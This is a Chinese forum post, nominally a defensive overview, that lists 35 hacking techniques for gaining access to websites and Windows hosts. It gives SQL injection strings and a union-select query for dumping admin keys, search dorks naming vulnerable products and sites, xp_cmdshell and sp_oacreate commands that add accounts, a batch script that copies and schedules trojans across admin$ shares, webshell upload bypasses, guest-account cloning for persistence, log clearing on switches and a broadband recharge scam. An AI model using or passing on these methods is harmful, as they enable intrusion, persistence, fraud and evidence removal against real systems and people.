|
现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客**网络的五十种方法,让大家做到有备无患。
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
2.搜索栏里输入
关键字%'and 1=1 and '%'='
关键字%'and 1=2 and '%'='
比较不同处 可以作为注入的特征字符
3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是
4.我们先到www.google.com底下搜索一下Co Net MIB Ver 1.0
密码帐号都是 'or'='or'
5.挂马代码
6.http://www.wyyfk.com/24小时挂QQ工具
7.开启regedt32的SAM的管理员权限 检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被**过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
net localgroup administrators还是可以看出Guest是管理员来
7.只要敢想,新浪也可** 注入点
http://igame.sina.com.cn/plaza/e ... iew.asp?event_id=59 微软官方网站注入点
http://www.microsoft.com/library ... =iso-8859-1&qu= 8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗木马
9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器
SQL注入后,如何上传木马,
文章地址 http://hack123.home4u.china.com/0601.htm 10.QQ强制聊天代码
http://wpa.qq.com/msgrd?V=1&Uin=对方的qq号&Site=ioshenmue&Menu=yes
使用方法:把代码中的红色的“********”星号换成你想与其聊天的QQ号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发QQ消息。
11. mybbs论坛cookie欺骗 后台备份马
12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
用法: 安装: instsrv.exe 服务名称 路径
卸载: instsrv.exe 服务名称 REMOVE
13.以动网为例数据库查找DV_LOG,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%B7%E7%A4%CE%B0%D7%D2%C2&password2=01180017&username1=%B7%E7%A4%CE%B0%D7%D2%C2&Submit=%CC%ED+%BC%D3 password2=01180017就是他的登陆密码
14.搜索的技巧 inurl:网址
15.启航工作室WMS 5.0网站程序漏洞
在baidu 搜索Powered by: SailingStudio Website Manage System 5.0 (SP1)
利用动画看http://soft.77119.com/62/20050530/6824.html 16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/ 工具下载www.hack6.com 地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面
18.SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库
19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了
工具使用方法动画和所有文件
http://www.anquanwu.com/bbs/printpage.asp?BoardID=2&ID=811 20.缺少xp_cmdshell时
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
21.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头
22.搜索 Powered by Discuz!4.0.0RC3 开放头像的可利用 工具地址www.hack6.com 23.DV7.1用还原数据功能 还原asa木马
24.凡人网络购物系统V6.0 可以%5c暴库
25.IPB2.0.2漏洞 构造语句
$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 IPB<= 2.0.3论坛注入工具 www.hack6.com有下载
26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间
27.北京冲QB要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲
28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马
29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路
30.在程序上传shell过程中,程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下: 保存为.asp,程序照样 执行.
31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马
32.喜欢网页挂马的看看这篇总结文章吧
http://77119.com/News/hk/2005060611656.html 33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库
34.IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
然后用#clear logg和#clear line vty *删除日志
如果,您想看下部分,欢迎加入我的兔群。剩下内容将在兔群发表!
——————网络安全团队——————
[ 此帖被在2014-10-11 18:02重新编辑 ]
|